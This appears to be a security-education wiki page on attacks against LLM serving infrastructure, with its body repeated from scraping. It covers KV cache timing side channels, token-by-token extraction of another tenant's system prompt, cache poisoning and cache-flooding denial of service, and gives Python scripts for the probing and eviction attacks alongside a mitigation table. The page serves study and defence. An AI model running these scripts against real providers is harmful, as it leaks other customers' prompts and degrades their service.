KV Cache & Prompt Caching Attacks

advanced12 min readUpdated 2026-03-16

How KV cache poisoning, prefix caching exploitation, cache timing side channels, and multi-tenant isolation failures create attack vectors in LLM serving infrastructure.

kv-cache prompt-caching side-channel multi-tenant infrastructure

Overview

Key-Value (KV) caching is a fundamental optimization in transformer-based LLM inference. During autoregressive generation, each new token requires attending to all previous tokens. Without caching, this means recomputing the key and value projections for every prior token at every generation step — an O(n^2) operation that becomes prohibitively expensive for long sequences. KV caching stores these computed key-value pairs so they are calculated only once, reducing generation to O(n) per token.

Prompt caching extends this optimization across requests. When multiple API calls share a common prefix (such as a system prompt), the KV cache entries for that prefix can be computed once and reused across all requests that share it. This is a critical cost optimization for API providers: a system prompt that appears in millions of requests per day needs to be processed through the model's layers only once. Providers including OpenAI, Anthropic, and Google have deployed various forms of prompt caching to reduce inference costs by 50-90% for requests with shared prefixes.

However, caching introduces shared state into what should be an isolated computation. When two requests share cached KV entries, there is an implicit information channel between them. If the cache is not properly isolated, this channel can be exploited to leak information (timing side channels), influence other users' outputs (cache poisoning), or infer details about the serving infrastructure (cache probing). These attacks target the infrastructure layer rather than the model itself, placing them in a blind spot for safety teams focused on prompt-level and model-level attacks.

The risk is particularly acute in multi-tenant serving environments where multiple customers share GPU resources and, potentially, KV cache memory. Cost pressures incentivize maximal cache sharing; security requires strict isolation. This tension creates a persistent attack surface that grows as providers optimize for efficiency.

How It Works

Understand the KV cache architecture
In a transformer with L layers and H attention heads, the KV cache stores two tensors per layer per head for each token position. For a model with 32 layers, 32 heads, and a head dimension of 128 running in FP16:
```
Cache size per token = 2 (K+V) x 32 layers x 32 heads x 128 dim x 2 bytes
                     = 524,288 bytes ≈ 0.5 MB per token

For a 4096-token context:
Total KV cache = 4096 x 0.5 MB ≈ 2 GB per request
```
This memory pressure drives cache sharing. A single GPU with 80 GB of memory can serve only ~40 concurrent requests at full context length. Prefix caching reduces this by sharing the KV entries for common prefixes across concurrent requests.

Cache timing side channels

When a request hits the prompt cache (its prefix matches cached KV entries), the time-to-first-token (TTFT) is significantly shorter because the prefix does not need to be processed through the model. This timing difference is observable by the API caller.

import time
 
def measure_ttft(client, system_prompt, user_message):
    """Measure time-to-first-token to detect cache hits."""
    start = time.perf_counter()
    response = client.chat.completions.create(
        model="gpt-4o",
        messages=[
            {"role": "system", "content": system_prompt},
            {"role": "user", "content": user_message},
        ],
        max_tokens=1,
        stream=True,
    )
    for chunk in response:
        if chunk.choices[0].delta.content:
            ttft = time.perf_counter() - start
            break
    return ttft
 
# Probe whether a specific system prompt is cached
# (i.e., whether another user is using this system prompt)
candidate_prompts = [
    "You are a helpful financial advisor for AcmeCorp...",
    "You are a medical assistant for HealthCo...",
    "You are a legal advisor for LawFirm...",
]
 
for prompt in candidate_prompts:
    ttft = measure_ttft(client, prompt, "Hello")
    print(f"TTFT: {ttft:.3f}s — {'CACHE HIT' if ttft < 0.5 else 'CACHE MISS'}")

A cache hit reveals that another user (or the same provider) is actively using that system prompt, leaking information about the provider's customer base and their system configurations.

Prefix probing for system prompt inference

By systematically testing candidate system prompt prefixes and measuring TTFT, an attacker can reconstruct another user's system prompt character by character (or token by token). This is analogous to a padding oracle attack in cryptography.

def probe_system_prompt_prefix(client, known_prefix, candidate_tokens):
    """
    Given a known prefix of a system prompt, determine the next token
    by testing candidates and measuring cache timing.
    """
    results = []
    for token in candidate_tokens:
        test_prefix = known_prefix + token
        # Measure TTFT multiple times for statistical significance
        timings = [
            measure_ttft(client, test_prefix, "test")
            for _ in range(10)
        ]
        avg_ttft = sum(timings) / len(timings)
        results.append((token, avg_ttft))
 
    # The candidate that produces the shortest TTFT likely extends
    # the cached prefix — it matches more of the cached KV entries
    results.sort(key=lambda x: x[1])
    most_likely_next = results[0][0]
    return most_likely_next

This attack requires that the target system prompt is actively being cached (i.e., the target system is actively receiving requests) and that the attacker can make requests through the same serving infrastructure.

KV cache poisoning in shared environments
In multi-tenant deployments where cache entries are shared without proper isolation, an attacker may be able to inject malicious KV entries that affect other users' requests.
The attack targets the prefix matching mechanism. If the serving infrastructure identifies cache entries by prefix hash rather than by full content verification, hash collisions could cause one user's cached prefix to be served for a different user's request. While hash collisions are rare, targeted collision attacks against weak hash functions are feasible.
More practically, if the cache key includes only the system prompt and not a tenant identifier, then two tenants using the same system prompt share KV cache entries. If one tenant has manipulated the serving infrastructure (e.g., through adversarial batching), the corrupted cache entries affect both tenants.
Attack flow: 1. Attacker identifies target system prompt (via timing side channel) 2. Attacker sends request with same system prompt + adversarial suffix 3. If cache key is computed on the shared prefix, the attacker's suffix processing may influence cached entries for the prefix 4. Subsequent requests from the target that hit the cache receive subtly corrupted KV values

Cache eviction attacks for denial of service

An attacker can deliberately evict cached entries belonging to other users by flooding the cache with unique prefixes, forcing cache replacement. This is a denial-of-service attack against the caching infrastructure that degrades performance for targeted users.

import random
import string
 
def cache_eviction_attack(client, n_requests=10000):
    """
    Flood the prompt cache with unique prefixes to evict
    other users' cached entries.
    """
    for i in range(n_requests):
        # Generate a unique system prompt that won't match any cache
        random_suffix = ''.join(
            random.choices(string.ascii_letters, k=100)
        )
        unique_prompt = f"You are assistant #{i}. ID: {random_suffix}"
 
        client.chat.completions.create(
            model="gpt-4o",
            messages=[
                {"role": "system", "content": unique_prompt},
                {"role": "user", "content": "Hi"},
            ],
            max_tokens=1,
        )
    # Each unique prefix allocates new cache entries,
    # potentially evicting other users' cached prefixes

Attack Examples

Example 1: System Prompt Extraction via Cache Timing

A security researcher targets an application built on a commercial LLM API. The application uses a detailed system prompt that includes proprietary instructions, customer data schemas, and tool definitions. By making API calls with candidate system prompt prefixes through the same provider and measuring TTFT, the researcher reconstructs the first 500 tokens of the system prompt over approximately 50,000 API calls. The reconstructed prompt reveals tool definitions, allowed actions, and data schemas that constitute intellectual property and provide attack surface information for further exploitation.

This attack was demonstrated in principle by researchers in 2024 who showed that Anthropic's prompt caching feature, which offers a 90% cost reduction for cached prefixes, creates a measurable timing differential that can be used for prefix inference. The attack's feasibility depends on the provider's cache architecture — specifically, whether cache entries are shared across customers and whether timing information is observable.

Example 2: Multi-Tenant Cache Isolation Failure

In a self-hosted deployment using vLLM or TensorRT-LLM with prefix caching enabled, two customers share the same GPU cluster. Customer A uses a system prompt that includes sensitive access control rules. Customer B discovers that by using the same system prompt prefix and observing generation behavior, they can infer whether the KV cache entries from Customer A's requests are being reused. When cache isolation is not enforced at the tenant level, shared cache entries create an implicit information channel between tenants.

Example 3: Cache-Aware Adversarial Batching

An attacker who has access to batch inference endpoints crafts a batch of requests designed to fill specific KV cache positions with adversarial values. If the serving framework uses PagedAttention (as in vLLM) and does not properly isolate page tables between requests in a batch, the adversarial KV values from one request in the batch may influence attention computation for other requests processed in the same batch. This attack is theoretically possible but has not been demonstrated at scale.

Detection & Mitigation

Strategy	Implementation	Effectiveness
Tenant-level cache isolation	Include tenant ID in cache keys; never share KV entries across tenants	High — eliminates cross-tenant information leakage but reduces cache efficiency
Timing noise injection	Add random delay to time-to-first-token to mask cache hit/miss signals	Medium — makes timing attacks noisier but does not eliminate them with sufficient samples
Cache key integrity verification	Verify full prefix content matches (not just hash) when serving cached KV entries	High — prevents collision-based poisoning but adds latency
Rate limiting on unique prefixes	Limit the number of unique system prompts per API key within a time window	Medium — slows cache probing and eviction attacks
TTFT normalization	Serve all responses with a minimum TTFT that matches cache-miss latency	High — eliminates timing signal entirely but sacrifices the latency benefit of caching
Cache partitioning	Allocate dedicated cache partitions per tenant with guaranteed capacity	High — prevents eviction attacks but requires more memory
Monitoring cache access patterns	Alert on anomalous cache access patterns (systematic prefix probing, high unique prefix rates)	Medium — detects attacks in progress but does not prevent initial probing

Key Considerations

Efficiency and security are directly at odds. The entire value of prompt caching comes from sharing computation across requests. Every security measure that restricts sharing — tenant isolation, cache partitioning, TTFT normalization — reduces the efficiency benefit. Providers must explicitly decide where on the efficiency-security tradeoff they sit and document this for customers.

Side channels are inherent to shared infrastructure. Timing side channels are not a bug in the cache implementation; they are a fundamental property of shared computation. Any shared resource — cache, GPU, network — creates potential side channels. Eliminating all side channels requires dedicated infrastructure per tenant, which many providers cannot afford.

Self-hosted deployments are at higher risk. Organizations running their own LLM serving infrastructure (using frameworks like vLLM, TensorRT-LLM, or text-generation-inference) often enable prefix caching for cost savings without implementing tenant isolation. These deployments may share KV cache across all requests on a GPU, creating a larger attack surface than managed API services which typically implement some degree of isolation.

The PagedAttention paradigm introduces new risks. Modern serving frameworks use PagedAttention to manage KV cache memory efficiently through virtual memory-like page tables. While PagedAttention dramatically improves memory utilization, its memory management model (shared physical pages, copy-on-write) introduces the same classes of vulnerabilities that plagued operating system virtual memory — including confused deputy attacks and TOCTOU (time-of-check-to-time-of-use) races on page table entries.

References

Kwon et al., "Efficient Memory Management for Large Language Model Serving with PagedAttention" (SOSP 2023) — PagedAttention KV cache management in vLLM
Anthropic, "Prompt Caching" (2024) — Prompt caching feature documentation and cache behavior
Pope et al., "Efficiently Scaling Transformer Inference" (MLSys 2023) — KV cache optimization strategies and memory analysis

Knowledge Check

How can an attacker use cache timing to extract information about another user's system prompt?

Edit this page on GitHub

KV Cache & Prompt Caching Attacks

advanced12 min readUpdated 2026-03-16

How KV cache poisoning, prefix caching exploitation, cache timing side channels, and multi-tenant isolation failures create attack vectors in LLM serving infrastructure.

kv-cache prompt-caching side-channel multi-tenant infrastructure

Overview

How It Works

Understand the KV cache architecture
In a transformer with L layers and H attention heads, the KV cache stores two tensors per layer per head for each token position. For a model with 32 layers, 32 heads, and a head dimension of 128 running in FP16:
```
Cache size per token = 2 (K+V) x 32 layers x 32 heads x 128 dim x 2 bytes
                     = 524,288 bytes ≈ 0.5 MB per token

For a 4096-token context:
Total KV cache = 4096 x 0.5 MB ≈ 2 GB per request
```
This memory pressure drives cache sharing. A single GPU with 80 GB of memory can serve only ~40 concurrent requests at full context length. Prefix caching reduces this by sharing the KV entries for common prefixes across concurrent requests.

Cache timing side channels

import time
 
def measure_ttft(client, system_prompt, user_message):
    """Measure time-to-first-token to detect cache hits."""
    start = time.perf_counter()
    response = client.chat.completions.create(
        model="gpt-4o",
        messages=[
            {"role": "system", "content": system_prompt},
            {"role": "user", "content": user_message},
        ],
        max_tokens=1,
        stream=True,
    )
    for chunk in response:
        if chunk.choices[0].delta.content:
            ttft = time.perf_counter() - start
            break
    return ttft
 
# Probe whether a specific system prompt is cached
# (i.e., whether another user is using this system prompt)
candidate_prompts = [
    "You are a helpful financial advisor for AcmeCorp...",
    "You are a medical assistant for HealthCo...",
    "You are a legal advisor for LawFirm...",
]
 
for prompt in candidate_prompts:
    ttft = measure_ttft(client, prompt, "Hello")
    print(f"TTFT: {ttft:.3f}s — {'CACHE HIT' if ttft < 0.5 else 'CACHE MISS'}")

A cache hit reveals that another user (or the same provider) is actively using that system prompt, leaking information about the provider's customer base and their system configurations.

Prefix probing for system prompt inference

def probe_system_prompt_prefix(client, known_prefix, candidate_tokens):
    """
    Given a known prefix of a system prompt, determine the next token
    by testing candidates and measuring cache timing.
    """
    results = []
    for token in candidate_tokens:
        test_prefix = known_prefix + token
        # Measure TTFT multiple times for statistical significance
        timings = [
            measure_ttft(client, test_prefix, "test")
            for _ in range(10)
        ]
        avg_ttft = sum(timings) / len(timings)
        results.append((token, avg_ttft))
 
    # The candidate that produces the shortest TTFT likely extends
    # the cached prefix — it matches more of the cached KV entries
    results.sort(key=lambda x: x[1])
    most_likely_next = results[0][0]
    return most_likely_next

KV cache poisoning in shared environments
In multi-tenant deployments where cache entries are shared without proper isolation, an attacker may be able to inject malicious KV entries that affect other users' requests.
The attack targets the prefix matching mechanism. If the serving infrastructure identifies cache entries by prefix hash rather than by full content verification, hash collisions could cause one user's cached prefix to be served for a different user's request. While hash collisions are rare, targeted collision attacks against weak hash functions are feasible.
More practically, if the cache key includes only the system prompt and not a tenant identifier, then two tenants using the same system prompt share KV cache entries. If one tenant has manipulated the serving infrastructure (e.g., through adversarial batching), the corrupted cache entries affect both tenants.
Attack flow: 1. Attacker identifies target system prompt (via timing side channel) 2. Attacker sends request with same system prompt + adversarial suffix 3. If cache key is computed on the shared prefix, the attacker's suffix processing may influence cached entries for the prefix 4. Subsequent requests from the target that hit the cache receive subtly corrupted KV values

Cache eviction attacks for denial of service

import random
import string
 
def cache_eviction_attack(client, n_requests=10000):
    """
    Flood the prompt cache with unique prefixes to evict
    other users' cached entries.
    """
    for i in range(n_requests):
        # Generate a unique system prompt that won't match any cache
        random_suffix = ''.join(
            random.choices(string.ascii_letters, k=100)
        )
        unique_prompt = f"You are assistant #{i}. ID: {random_suffix}"
 
        client.chat.completions.create(
            model="gpt-4o",
            messages=[
                {"role": "system", "content": unique_prompt},
                {"role": "user", "content": "Hi"},
            ],
            max_tokens=1,
        )
    # Each unique prefix allocates new cache entries,
    # potentially evicting other users' cached prefixes

Strategy	Implementation	Effectiveness
Tenant-level cache isolation	Include tenant ID in cache keys; never share KV entries across tenants	High — eliminates cross-tenant information leakage but reduces cache efficiency
Timing noise injection	Add random delay to time-to-first-token to mask cache hit/miss signals	Medium — makes timing attacks noisier but does not eliminate them with sufficient samples
Cache key integrity verification	Verify full prefix content matches (not just hash) when serving cached KV entries	High — prevents collision-based poisoning but adds latency
Rate limiting on unique prefixes	Limit the number of unique system prompts per API key within a time window	Medium — slows cache probing and eviction attacks
TTFT normalization	Serve all responses with a minimum TTFT that matches cache-miss latency	High — eliminates timing signal entirely but sacrifices the latency benefit of caching
Cache partitioning	Allocate dedicated cache partitions per tenant with guaranteed capacity	High — prevents eviction attacks but requires more memory
Monitoring cache access patterns	Alert on anomalous cache access patterns (systematic prefix probing, high unique prefix rates)	Medium — detects attacks in progress but does not prevent initial probing

Key Considerations

References

Kwon et al., "Efficient Memory Management for Large Language Model Serving with PagedAttention" (SOSP 2023) — PagedAttention KV cache management in vLLM
Anthropic, "Prompt Caching" (2024) — Prompt caching feature documentation and cache behavior
Pope et al., "Efficiently Scaling Transformer Inference" (MLSys 2023) — KV cache optimization strategies and memory analysis

Knowledge Check

How can an attacker use cache timing to extract information about another user's system prompt?

Edit this page on GitHub

KV Cache & Prompt Caching Attacks

Understand the KV cache architecture

Cache timing side channels

Prefix probing for system prompt inference

KV cache poisoning in shared environments

Cache eviction attacks for denial of service

Related articles

KV Cache & Prompt Caching Attacks

Understand the KV cache architecture

Cache timing side channels

Prefix probing for system prompt inference

KV cache poisoning in shared environments

Cache eviction attacks for denial of service

Related articles